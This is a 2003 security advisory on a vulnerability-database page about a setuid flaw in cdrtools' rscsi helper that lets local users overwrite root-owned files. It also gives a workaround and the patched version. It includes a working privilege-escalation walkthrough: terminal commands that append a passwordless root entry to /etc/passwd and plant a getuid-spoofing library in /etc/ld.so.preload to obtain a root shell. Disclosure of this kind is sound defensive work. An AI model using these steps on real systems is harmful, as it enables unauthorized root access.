Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

SRT2003-08-01-0126.txt

🗓️ 05 Aug 2003 00:00:00Reported by Kevin FinisterreType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 29 Views

Secure Network Operations addresses a critical security flaw in cdrtools allowing root access.

Code
`Secure Network Operations, Inc. http://www.secnetops.com  
Strategic Reconnaissance Team [email protected]  
Team Lead Contact [email protected]  
  
  
Our Mission:  
************************************************************************  
Secure Network Operations offers expertise in Networking, Intrusion   
Detection Systems (IDS), Software Security Validation, and   
Corporate/Private Network Security. Our mission is to facilitate a   
secure and reliable Internet and inter-enterprise communications   
infrastructure through the products and services we offer.   
  
  
Quick Summary:  
************************************************************************  
Advisory Number : SRT2003-08-01-0126  
Product : cdrtools (rscsi)  
Version : Version <= cdrtools-2.x  
Vendor : ftp://ftp.berlios.de/pub/cdrecord/  
Class : local  
Criticality : High  
Operating System(s) : *nix  
  
  
High Level Explanation  
************************************************************************  
High Level Description : suid rscsi overwrites root owned files  
What to do : chmod -s /opt/schily/sbin/rscsi  
  
  
Technical Details  
************************************************************************  
Proof Of Concept Status : SNO has PoC code for this issue  
Low Level Description :   
  
Cdrecord supports DVD-R and DVD-RW with all known DVD-writers on all UNIX  
like operating systems and on Win32.   
  
A setuid helper binary allows files to be overwritten by non root users.   
One side effect of the overwritten file is that the permissions become  
writable by the user calling the rscsi program. These issues can allow a  
non root user to take local root on the machine that has cdrtools installed  
  
Initial attempts to exploit this issue failed for an unknown reason... this  
however may still be a valid method of attack. We make use of the first   
argument passed to rscsi in order to choose the file we wish to write to.  
  
Due to the output from rscsi we make use of 0x08 in order to delete some of   
the characters that otherwise would be written. This attack method relys on   
placing a line of text at the end of a file. Please note that 2 other lines   
of garbage will be placed in the file which may cause other issues.   
  
elguapo@gentoo elguapo $ echo C`echo -e   
"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08r00t::0:0:root:/:/bin/bash\x0a"` |   
/opt/schily/sbin/rscsi /tmp/lala  
Segmentation fault (this segfault is not related to the security issue)  
  
elguapo@gentoo elguapo $ cat /tmp/lala  
rscsid: user id 1000, name elguapo  
rmt: stdin is a PIPE  
r00t::0:0:root:/root:/bin/bash  
  
When attempting to echo this line to the password file we get the following   
error. Please note that the password file IS still overwritten at this point.   
  
E0  
Illegal user id for RSCSI server  
0  
  
elguapo@gentoo elguapo $ cat /etc/passwd  
rscsid: Illegal user '(NULL POINTER)' id 1000 for RSCSI server  
rscsid:>E 0 (Illegal user id for RSCSI server) []  
  
We DO however have other exploitation options such as the one listed below.   
  
[kf@vegeta kf]$ ls -al /etc/ld.so.preload  
ls: /etc/ld.so.preload: No such file or directory  
  
[kf@vegeta kf]$ cat > oops.c  
int getuid(void)  
{  
return(0);  
}  
  
[kf@vegeta kf]$ gcc -c -o oops.o oops.c  
[kf@vegeta kf]$ ld -shared -o oops.so oops.o  
[kf@vegeta kf]$ ls -al oops.so  
-rwxrwxr-x 1 kf kf 1714 Jul 30 18:53 oops.so  
  
[kf@vegeta kf]$ echo duh_kf | /opt/schily/sbin/rscsi /etc/ld.so.preload  
E0  
Garbage command  
0  
  
Note that we now have write permissions to /etc/ld.so.preload  
-rw-rw-r-- 1 root kf 1 Jul 30 19:29 /etc/ld.so.preload  
  
Time to take root  
[kf@vegeta kf]$ echo /home/kf/oops.so > /etc/ld.so.preload  
[kf@vegeta kf]$ su  
[root@vegeta kf]# rm /etc/ld.so.preload  
rm: remove regular file `/etc/ld.so.preload'? y  
[root@vegeta kf]# id  
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)  
  
Patch or Workaround : chmod -s /opt/schily/sbin/rscsi  
  
Vendor Status : patched in cdrtools-2.01a18.tar.gz  
  
Bugtraq URL : to be assigned  
  
------------------------------------------------------------------------  
This advisory was released by Secure Network Operations,Inc. as a matter  
of notification to help administrators protect their networks against  
the described vulnerability. Exploit source code is no longer released  
in our advisories. Contact [email protected] for information on how  
to obtain exploit information.  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 Aug 2003 00:00Current
7.4High risk
Vulners AI Score7.4
secure network operationssecurity flawcdrtoolsroot accessunix systemsadvisory number.
29